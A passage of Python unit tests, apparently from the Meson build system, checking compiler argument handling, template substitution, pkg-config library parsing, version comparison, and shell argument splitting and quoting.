self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group']) # Adding libbaz again does nothing l.append_direct('/libbaz.a') self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group']) # Adding a non-library argument doesn't include it in the group l += ['-Lfoo', '-Wl,--export-dynamic'] self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic']) # -Wl,-lfoo is detected as a library and gets added to the group l.append('-Wl,-ldl') self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group']) def test_compiler_args_remove_system(self): ## Test --start/end-group linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', []) gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker) ## Ensure that the fake compiler is never called by overriding the relevant function gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include'] ## Test that 'direct' append and extend works l = gcc.compiler_args(['-Lfoodir', '-lfoo']) self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group']) ## Test that to_native removes all system includes l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include'] self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1']) def test_string_templates_substitution(self): dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict substfunc = mesonbuild.mesonlib.substitute_values ME = mesonbuild.mesonlib.MesonException # Identity self.assertEqual(dictfunc([], []), {}) # One input, no outputs inputs = ['bar/foo.c.in'] outputs = [] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@INPUT@.out', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:]) cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:]) cmd = ['@INPUT@', '@BASENAME@.hah', 'strings'] self.assertEqual(substfunc(cmd, d), inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:]) cmd = ['@OUTPUT@'] self.assertRaises(ME, substfunc, cmd, d) # One input, one output inputs = ['bar/foo.c.in'] outputs = ['out.c'] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c', '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@INPUT@.out', '@OUTPUT@', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + outputs + cmd[2:]) cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs) cmd = ['@INPUT@', '@BASENAME@.hah', 'strings'] self.assertEqual(substfunc(cmd, d), inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:]) # One input, one output with a subdir outputs = ['dir/out.c'] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c', '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'} # Check dictionary self.assertEqual(ret, d) # Two inputs, no outputs inputs = ['bar/foo.c.in', 'baz/foo.c.in'] outputs = [] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@INPUT@', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), inputs + cmd[1:]) cmd = ['@INPUT0@.out', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:]) cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:]) cmd = ['@INPUT0@', '@INPUT1@', 'strings'] self.assertEqual(substfunc(cmd, d), inputs + cmd[2:]) # Many inputs, can't use @INPUT@ like this cmd = ['@INPUT@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough inputs cmd = ['@INPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Too many inputs cmd = ['@PLAINNAME@'] self.assertRaises(ME, substfunc, cmd, d) cmd = ['@BASENAME@'] self.assertRaises(ME, substfunc, cmd, d) # No outputs cmd = ['@OUTPUT@'] self.assertRaises(ME, substfunc, cmd, d) cmd = ['@OUTPUT0@'] self.assertRaises(ME, substfunc, cmd, d) cmd = ['@OUTDIR@'] self.assertRaises(ME, substfunc, cmd, d) # Two inputs, one output outputs = ['dir/out.c'] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1], '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@OUTPUT@', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), outputs + cmd[1:]) cmd = ['@OUTPUT@.out', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:]) cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings'] self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:]) # Many inputs, can't use @INPUT@ like this cmd = ['@INPUT@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough inputs cmd = ['@INPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough outputs cmd = ['@OUTPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Two inputs, two outputs outputs = ['dir/out.c', 'dir/out2.c'] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1], '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1], '@OUTDIR@': 'dir'} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@OUTPUT@', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), outputs + cmd[1:]) cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings'] self.assertEqual(substfunc(cmd, d), outputs + cmd[2:]) cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@'] self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir']) # Many inputs, can't use @INPUT@ like this cmd = ['@INPUT@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough inputs cmd = ['@INPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough outputs cmd = ['@OUTPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Many outputs, can't use @OUTPUT@ like this cmd = ['@OUTPUT@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) def test_needs_exe_wrapper_override(self): config = ConfigParser() config['binaries'] = { 'c': '\'/usr/bin/gcc\'', } config['host_machine'] = { 'system': '\'linux\'', 'cpu_family': '\'arm\'', 'cpu': '\'armv7\'', 'endian': '\'little\'', } # Can not be used as context manager because we need to # open it a second time and this is not possible on # Windows. configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False) configfilename = configfile.name config.write(configfile) configfile.flush() configfile.close() opts = get_fake_options() opts.cross_file = (configfilename,) env = get_fake_env(opts=opts) detected_value = env.need_exe_wrapper() os.unlink(configfilename) desired_value = not detected_value config['properties'] = { 'needs_exe_wrapper': 'true' if desired_value else 'false' } configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False) configfilename = configfile.name config.write(configfile) configfile.close() opts = get_fake_options() opts.cross_file = (configfilename,) env = get_fake_env(opts=opts) forced_value = env.need_exe_wrapper() os.unlink(configfilename) self.assertEqual(forced_value, desired_value) def test_listify(self): listify = mesonbuild.mesonlib.listify # Test sanity self.assertEqual([1], listify(1)) self.assertEqual([], listify([])) self.assertEqual([1], listify([1])) # Test flattening self.assertEqual([1, 2, 3], listify([1, [2, 3]])) self.assertEqual([1, 2, 3], listify([1, [2, [3]]])) self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False)) # Test flattening and unholdering holder1 = ObjectHolder(1) self.assertEqual([holder1], listify(holder1)) self.assertEqual([holder1], listify([holder1])) self.assertEqual([holder1, 2], listify([holder1, 2])) self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]])) def test_unholder(self): unholder = mesonbuild.mesonlib.unholder holder1 = ObjectHolder(1) holder3 = ObjectHolder(3) holders = [holder1, holder3] self.assertEqual(1, unholder(holder1)) self.assertEqual([1], unholder([holder1])) self.assertEqual([1, 3], unholder(holders)) def test_extract_as_list(self): extract = mesonbuild.mesonlib.extract_as_list # Test sanity kwargs = {'sources': [1, 2, 3]} self.assertEqual([1, 2, 3], extract(kwargs, 'sources')) self.assertEqual(kwargs, {'sources': [1, 2, 3]}) self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True)) self.assertEqual(kwargs, {}) # Test unholding holder3 = ObjectHolder(3) kwargs = {'sources': [1, 2, holder3]} self.assertEqual(kwargs, {'sources': [1, 2, holder3]}) # flatten nested lists kwargs = {'sources': [1, [2, [3]]]} self.assertEqual([1, 2, 3], extract(kwargs, 'sources')) def test_pkgconfig_module(self): dummystate = mock.Mock() dummystate.subproject = 'dummy' _mock = mock.Mock(spec=mesonbuild.dependencies.ExternalDependency) _mock.pcdep = mock.Mock() _mock.pcdep.name = "some_name" _mock.version_reqs = [] _mock = mock.Mock(held_object=_mock) # pkgconfig dependency as lib deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib") deps.add_pub_libs([_mock]) self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name") # pkgconfig dependency as requires deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib") deps.add_pub_reqs([_mock]) self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name") def _test_all_naming(self, cc, env, patterns, platform): shr = patterns[platform]['shared'] stc = patterns[platform]['static'] shrstc = shr + tuple([x for x in stc if x not in shr]) stcshr = stc + tuple([x for x in shr if x not in stc]) p = cc.get_library_naming(env, LibType.SHARED) self.assertEqual(p, shr) p = cc.get_library_naming(env, LibType.STATIC) self.assertEqual(p, stc) p = cc.get_library_naming(env, LibType.PREFER_STATIC) self.assertEqual(p, stcshr) p = cc.get_library_naming(env, LibType.PREFER_SHARED) self.assertEqual(p, shrstc) # Test find library by mocking up openbsd if platform != 'openbsd': return with tempfile.TemporaryDirectory() as tmpdir: with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f: f.write('') with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f: f.write('') with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f: f.write('') with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f: f.write('') with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f: f.write('') found = cc._find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED) self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0') def test_find_library_patterns(self): ''' Unit test for the library search patterns used by find_library() ''' unix_static = ('lib{}.a', '{}.a') msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib') # This is the priority list of pattern matching for library searching patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'), 'static': unix_static}, 'linux': {'shared': ('lib{}.so', '{}.so'), 'static': unix_static}, 'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'), 'static': unix_static}, 'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll', 'lib{}.dll.a', '{}.dll', '{}.dll.a'), 'static': ('cyg{}.a',) + unix_static}, 'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'), 'static': msvc_static}, 'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll', '{}.dll.a', '{}.lib', '{}.dll'), 'static': msvc_static}} env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) if is_osx(): self._test_all_naming(cc, env, patterns, 'darwin') elif is_cygwin(): self._test_all_naming(cc, env, patterns, 'cygwin') elif is_windows(): if cc.get_argument_syntax() == 'msvc': self._test_all_naming(cc, env, patterns, 'windows-msvc') else: self._test_all_naming(cc, env, patterns, 'windows-mingw') elif is_openbsd(): self._test_all_naming(cc, env, patterns, 'openbsd') else: self._test_all_naming(cc, env, patterns, 'linux') env.machines.host.system = 'openbsd' self._test_all_naming(cc, env, patterns, 'openbsd') env.machines.host.system = 'darwin' self._test_all_naming(cc, env, patterns, 'darwin') env.machines.host.system = 'cygwin' self._test_all_naming(cc, env, patterns, 'cygwin') env.machines.host.system = 'windows' self._test_all_naming(cc, env, patterns, 'windows-mingw') @skipIfNoPkgconfig def test_pkgconfig_parse_libs(self): ''' Unit test for parsing of pkg-config output to search for libraries https://github.com/mesonbuild/meson/issues/3951 ''' def create_static_lib(name): if not is_osx(): name.open('w').close() return src = name.with_suffix('.c') out = name.with_suffix('.o') with src.open('w') as f: f.write('int meson_foobar (void) { return 0; }') subprocess.check_call(['clang', '-c', str(src), '-o', str(out)]) subprocess.check_call(['ar', 'csr', str(name), str(out)]) with tempfile.TemporaryDirectory() as tmpdir: pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True) env = get_fake_env() compiler = env.detect_c_compiler(MachineChoice.HOST) env.coredata.compilers.host = {'c': compiler} env.coredata.compiler_options.host['c']['link_args'] = FakeCompilerOptions() p1 = Path(tmpdir) / '1' p2 = Path(tmpdir) / '2' p1.mkdir() p2.mkdir() # libfoo.a is in one prefix create_static_lib(p1 / 'libfoo.a') # libbar.a is in both prefixes create_static_lib(p1 / 'libbar.a') create_static_lib(p2 / 'libbar.a') # Ensure that we never statically link to these create_static_lib(p1 / 'libpthread.a') create_static_lib(p1 / 'libm.a') create_static_lib(p1 / 'libc.a') create_static_lib(p1 / 'libdl.a') create_static_lib(p1 / 'librt.a') def fake_call_pkgbin(self, args, env=None): if '--libs' not in args: return 0, '', '' if args[-1] == 'foo': return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), '' if args[-1] == 'bar': return 0, '-L{} -lbar'.format(p2.as_posix()), '' if args[-1] == 'internal': return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), '' old_call = PkgConfigDependency._call_pkgbin old_check = PkgConfigDependency.check_pkgconfig PkgConfigDependency._call_pkgbin = fake_call_pkgbin PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin # Test begins try: kwargs = {'required': True, 'silent': True} foo_dep = PkgConfigDependency('foo', env, kwargs) self.assertEqual(foo_dep.get_link_args(), [(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()]) bar_dep = PkgConfigDependency('bar', env, kwargs) self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()]) internal_dep = PkgConfigDependency('internal', env, kwargs) if compiler.get_argument_syntax() == 'msvc': self.assertEqual(internal_dep.get_link_args(), []) else: link_args = internal_dep.get_link_args() for link_arg in link_args: for lib in ('pthread', 'm', 'c', 'dl', 'rt'): self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args) finally: # Test ends PkgConfigDependency._call_pkgbin = old_call PkgConfigDependency.check_pkgconfig = old_check # Reset dependency class to ensure that in-process configure doesn't mess up PkgConfigDependency.pkgbin_cache = {} PkgConfigDependency.class_pkgbin = PerMachine(None, None) def test_version_compare(self): comparefunc = mesonbuild.mesonlib.version_compare_many for (a, b, result) in [ ('0.99.beta19', '>= 0.99.beta14', True), ]: self.assertEqual(comparefunc(a, b)[0], result) for (a, b, op) in [ # examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison ("1.0010", "1.9", operator.gt), ("1.05", "1.5", operator.eq), ("1.0", "1", operator.gt), ("2.50", "2.5", operator.gt), ("fc4", "fc.4", operator.eq), ("FC5", "fc4", operator.lt), ("2a", "2.0", operator.lt), ("1.0", "1.fc4", operator.gt), ("3.0.0_fc", "3.0.0.fc", operator.eq), # from RPM tests ("1.0", "1.0", operator.eq), ("1.0", "2.0", operator.lt), ("2.0", "1.0", operator.gt), ("2.0.1", "2.0.1", operator.eq), ("2.0", "2.0.1", operator.lt), ("2.0.1", "2.0", operator.gt), ("2.0.1a", "2.0.1a", operator.eq), ("2.0.1a", "2.0.1", operator.gt), ("2.0.1", "2.0.1a", operator.lt), ("5.5p1", "5.5p1", operator.eq), ("5.5p1", "5.5p2", operator.lt), ("5.5p2", "5.5p1", operator.gt), ("5.5p10", "5.5p10", operator.eq), ("5.5p1", "5.5p10", operator.lt), ("5.5p10", "5.5p1", operator.gt), ("10xyz", "10.1xyz", operator.lt), ("10.1xyz", "10xyz", operator.gt), ("xyz10", "xyz10", operator.eq), ("xyz10", "xyz10.1", operator.lt), ("xyz10.1", "xyz10", operator.gt), ("xyz.4", "xyz.4", operator.eq), ("xyz.4", "8", operator.lt), ("8", "xyz.4", operator.gt), ("xyz.4", "2", operator.lt), ("2", "xyz.4", operator.gt), ("5.5p2", "5.6p1", operator.lt), ("5.6p1", "5.5p2", operator.gt), ("5.6p1", "6.5p1", operator.lt), ("6.5p1", "5.6p1", operator.gt), ("6.0.rc1", "6.0", operator.gt), ("6.0", "6.0.rc1", operator.lt), ("10b2", "10a1", operator.gt), ("10a2", "10b2", operator.lt), ("1.0aa", "1.0aa", operator.eq), ("1.0a", "1.0aa", operator.lt), ("1.0aa", "1.0a", operator.gt), ("10.0001", "10.0001", operator.eq), ("10.0001", "10.1", operator.eq), ("10.1", "10.0001", operator.eq), ("10.0001", "10.0039", operator.lt), ("10.0039", "10.0001", operator.gt), ("4.999.9", "5.0", operator.lt), ("5.0", "4.999.9", operator.gt), ("20101121", "20101121", operator.eq), ("20101121", "20101122", operator.lt), ("20101122", "20101121", operator.gt), ("2_0", "2_0", operator.eq), ("2.0", "2_0", operator.eq), ("2_0", "2.0", operator.eq), ("a", "a", operator.eq), ("a+", "a+", operator.eq), ("a+", "a_", operator.eq), ("a_", "a+", operator.eq), ("+a", "+a", operator.eq), ("+a", "_a", operator.eq), ("_a", "+a", operator.eq), ("+_", "+_", operator.eq), ("_+", "+_", operator.eq), ("_+", "_+", operator.eq), ("+", "_", operator.eq), ("_", "+", operator.eq), # other tests ('0.99.beta19', '0.99.beta14', operator.gt), ("1.0.0", "2.0.0", operator.lt), (".0.0", "2.0.0", operator.lt), ("alpha", "beta", operator.lt), ("1.0", "1.0.0", operator.lt), ("2.456", "2.1000", operator.lt), ("2.1000", "3.111", operator.lt), ("2.001", "2.1", operator.eq), ("2.34", "2.34", operator.eq), ("6.1.2", "6.3.8", operator.lt), ("1.7.3.0", "2.0.0", operator.lt), ("2.24.51", "2.25", operator.lt), ("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt), ("3.4.1", "3.4b1", operator.gt), ("041206", "200090325", operator.lt), ("0.6.2+git20130413", "0.6.2", operator.gt), ("2.6.0+bzr6602", "2.6.0", operator.gt), ("2.6.0", "2.6b2", operator.gt), ("2.6.0+bzr6602", "2.6b2x", operator.gt), ("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt), ("15.8b", "15.8.0.1", operator.lt), ("1.2rc1", "1.2.0", operator.lt), ]: ver_a = Version(a) ver_b = Version(b) if op is operator.eq: for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]: self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b)) if op is operator.lt: for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]: self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b)) for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]: self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b)) if op is operator.gt: for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]: self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b)) for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]: self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b)) def test_msvc_toolset_version(self): ''' Ensure that the toolset version returns the correct value for this MSVC ''' env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_argument_syntax() != 'msvc': raise unittest.SkipTest('Test only applies to MSVC-like compilers') toolset_ver = cc.get_toolset_version() self.assertIsNotNone(toolset_ver) # Visual Studio 2015 and older versions do not define VCToolsVersion # TODO: ICL doesn't set this in the VSC2015 profile either if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910: return if 'VCToolsVersion' in os.environ: vctools_ver = os.environ['VCToolsVersion'] else: self.assertIn('VCINSTALLDIR', os.environ) # See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/ vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text() self.assertTrue(vctools_ver.startswith(toolset_ver), msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver)) def test_split_args(self): split_args = mesonbuild.mesonlib.split_args join_args = mesonbuild.mesonlib.join_args if is_windows(): test_data = [ # examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments (r'"a b c" d e', ['a b c', 'd', 'e'], True), (r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False), (r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False), (r'a\\\"b c d', [r'a\"b', 'c', 'd'], False), (r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False), # other basics (r'""', [''], True), (r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True), (r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True), (r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True), (r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True), (r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True), ('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False), # more illustrative tests (r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True), (r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True), (r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False), (r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True), (r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False), (r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True), (r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True), (r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True), (r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False), (r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False), (r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True), (r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False), (r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False), (r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False), (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True), (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False), (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True), ] else: test_data = [ (r"'a b c' d e", ['a b c', 'd', 'e'], True), (r"a/b/c d e", ['a/b/c', 'd', 'e'], True), (r"a\b\c d e", [r'abc', 'd', 'e'], False), (r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False), (r'"a b c" d e', ['a b c', 'd', 'e'], False), (r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False), (r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True), (r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True), (r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False), (r"'a & b & c d e'", ['a & b & c d e'], True), (r"abd'e f'g h", [r'abde fg', 'h'], False), ('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False), ('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False), ("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True), ('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False), ("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True), ] for (cmd, expected, roundtrip) in test_data: self.assertEqual(split_args(cmd), expected) if roundtrip: self.assertEqual(join_args(expected), cmd) def test_quote_arg(self): split_args = mesonbuild.mesonlib.split_args quote_arg = mesonbuild.mesonlib.quote_arg if is_windows(): test_data = [ ('', '""'), ('arg1', 'arg1'), ('/option1', '/option1'), ('/Ovalue', '/Ovalue'), ('/OBob&Alice', '/OBob&Alice'), ('/Ovalue with spaces', r'"/Ovalue with spaces"'), (r'/O"value with spaces"', r'"/O\"value with spaces\""'), (r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'), ('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'), ('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'), (r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'), ] else: test_data = [ ('arg1', 'arg1'), ('--option1', '--option1'), ('-O=value', '-O=value'), ('-O=Bob&Alice', "'-O=Bob&Alice'"), ('-O=value with spaces', "'-O=value with spaces'"), ('-O="value with spaces"', '\'-O=\"value with spaces\"\''), ('-O=/path with spaces/test', '\'-O=/path with spaces/test\''), ('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"), ] for (arg, expected) in test_data: self.assertEqual(quote_arg(arg), expected) self.assertEqual(split_args(expected)[0], arg) def test_depfile(self): for (f, target, expdeps) in [ # empty, unknown target ([''], 'unknown', set()), # simple target & deps (['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})), (['meson/foo.o: foo.c foo.h'], 'foo.c', set()), # get all deps (['meson/foo.o: foo.c foo.h', 'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})), (['meson/foo.o: foo.c foo.h', 'foo.c: gen.py'], 'foo.c', set({'gen.py'})), # linue continuation, multiple targets (['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})), (['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})), 